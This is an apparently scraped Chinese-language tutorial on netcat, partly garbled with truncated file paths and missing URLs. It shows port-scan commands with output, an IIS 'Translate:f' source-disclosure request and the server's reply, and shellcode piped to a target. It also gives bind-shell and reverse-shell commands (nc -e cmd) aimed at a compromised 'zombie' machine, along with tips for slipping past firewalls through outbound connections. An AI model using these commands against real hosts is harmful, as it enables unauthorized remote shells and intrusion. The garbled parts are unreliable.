NC代码

NC代码

-

2023年3月17日发(作者：电容的特性)netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧……一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法，有此功能的原版NC好象要60KB：P），虽然”体积”小，但很完成很多工作。 一、基本使用想要连接到某处: nc [-options] hostname port[s] [ports] …绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-e prog 程序重定向，一旦连接，就执行 [危险!!]-g gateway source-routing hop point[s], up to 8-G num source-routing pointer: 4, 8, 12, …-h 帮助信息-i secs 延时的间隔-l 监听模式，用于入站连接-n 指定数字的IP地址，不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-u UDP模式-v 详细输出——用两个-v可得到更详细的内容-w secs timeout的时间-z 将输入输出关掉——用于扫描时其中端口号可以指定一个或者用lo-hi式的指定范围。例如：扫描端口tcp扫描C:nc>nc -v -z -w2 192.168.0.80 1-140net [192.168.0.80] 140 (?)net [192.168.0.80] 139 (netbios-ssn) opennet [192.168.0.80] 138 (?)net [192.168.0.80] 137 (netbios-ns)net [192.168.0.80] 136 (?)net [192.168.0.80] 135 (epmap) opennet [192.168.0.80] 81 (?) opennet [192.168.0.80] 80 (http) opennet [192.168.0.80] 79 (finger)net [192.168.0.80] 25 (smtp) opennet [192.168.0.80] 24 (?)net [192.168.0.80] 23 (telnet)net [192.168.0.80] 21 (ftp)udp扫描C:nc>nc -u -v -z -w2 192.168.0.80 1-140net [192.168.0.80] 140 (?) opennet [192.168.0.80] 139 (?) opennet [192.168.0.80] 138 (netbios-dgm) opennet [192.168.0.80] 137 (netbios-ns) opennet [192.168.0.80] 54 (?) opennet [192.168.0.80] 53 (domain) opennet [192.168.0.80] 38 (?) opennet [192.168.0.80] 37 (time) opennet [192.168.0.80] 7 (echo) open二、高级应用的MIME欺骗这个网站目录提供了黑客的n关，过了这n关证明你开始入门了。我做的的国产版。这个页面告诉我们的浏览器不是 IE6.72,我们的*作系统不是LIUNX,我们不是从/重定向链接过去的，linux有 IE6.72? 微软会在它的页面上放/cgi-bin/的链接？nc 221.10.222.34 80GET /level/level7.php HTTP/1.1 Accept:image/gif,image/x-xbitmap,application/msword,*/* Referer:/ Accept-Language:zh-cn Accept-Encodeing:gzip,deflate User-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686) Host:221.10.222.34 Connection:Keep-Alive 5 “Translate:f” 显示代码脆弱点Translate:f脆弱点的机制：发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型（例如.ASP或者）。这些文件是用于服务器上运行的，绝不会到客户机上去，而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上，而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f，并有一个反斜杠””附于URL之后。下面就有这样的一个例子（[CRLF]代表回车字符）注意 GET 后的反斜杠以及Translate:f头信息。GET / HTTP/1.0Host:192.168.0.1User-Agent:SensePostDataContent-Type:application/x-www-form-urlencodedTranslate:f[CRLF][CRLF]将以上内容保存在一个文本文件中（例如）然后向一个有这个漏洞的服务器发送c:>type | nc –nvv 192.168.0.80 80(UNKNOWN) [192.168.0.80] 80 (?) openHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Tue, 03 Dec 2002 08:50:46 GMTContent-Type: application/octet-streamContent-Length: 2790ETag: “0448299fcd6df1:bea”Last-Modified: Wed, 13 Nov 2002 18:50:46 GMTAccept-Ranges: bytesCache-Control: no-cache举例：1)连接到REMOTE主机，例子：格式：nc -nvv 192.168.x.x 80讲解：连到192.168.x.x的TCP80端口2)监听LOCAL主机，例子：格式：nc -l -p 80讲解：监听本机的TCP80端口3)扫描远程主机，例子：格式：nc -nvv -w2 -z 192.168.x.x 80-445讲解：扫描192.168.x.x的TCP80到TCP445的所有端口4)REMOTE主机绑定SHELL，例子：格式：nc -l -p 5354 -t -e c:讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口5)REMOTE主机绑定SHELL并反向连接，例子：格式：nc -t -e c: 192.168.x.x 5354讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口以上为最基本的几种用法（其实NC的用法还有很多，当配合管道命令”|”与重定向命令”“等等命令功能更强大……）。=====================================================================================================高级用法：6)作攻击程序用，例子：格式1： c:|nc -nvv 192.168.x.x 80格式2：nc -nvv 192.168.x.x 80 < c:讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:'的内容(两种格式确有相同的效果，真是有异曲同工之妙:P)附：'c:'为shellcod不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。为什么？咳！！听我给你讲啊！！（先交100000000RMB学费)哇，别杀我啊！！)nc -l -p 5277 （坚听本地5277端口）同样也可以用nc -l -v -p 5277运行在本地然后在远程机器上，想办法运行nc -e ip 5277（你可别真的打“ip”在肉机上啊）要打，这样！！呵呵，看看在本地机器上出现了什么？这样就是反弹~~在本地机器上得到了一个SHELL命令3：扫描端口nc -v ip portnc -v -z ip port-portnc -v -z -u ip port-port参数解释：-z：将输入输出关掉，在扫描时使用nc -v ip port这个命令是针对某一个端口进行扫描例如：nc -v ip 135扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息例如：80端口我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息nc -v -z ip port-port这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围例如：nc -v -z ip 1-200可以看到我机器上的1-200的TCP端口的开放情况nc -v -z -u ip port-port这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的例如：nc -v -z -u ip 1-200这个命令就会扫1-200的UDP端口命令4：传送文件（HOHO，I LIKE）LOCAL MACHINE：nc -v -n ip port y:参数解释：-n：指定数字的IP地址这两个命令结合起来是用来传送文件的首先，在远程机上运行命令：nc -v -l -p 5277 > c:这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口并把接受到的信息数据写到c:中这时候在本地机上运行nc -v -n ip 5277 < e:这个命令的意思就是，从本地E盘跟目录中读取文件的内容，并把这些数据发送到ip的5277端口上这样远程主机就会自动创建一个文件。。呵呵，你想到了吗？？上边是NC的比较常用的方法，希望通过这些，大家能发挥自己的想象力，创造出更多更精彩的命令来，因为NC的用法不仅仅局限于这几种而已哦！！对NC来说，只有想不到，没有做不到的！！！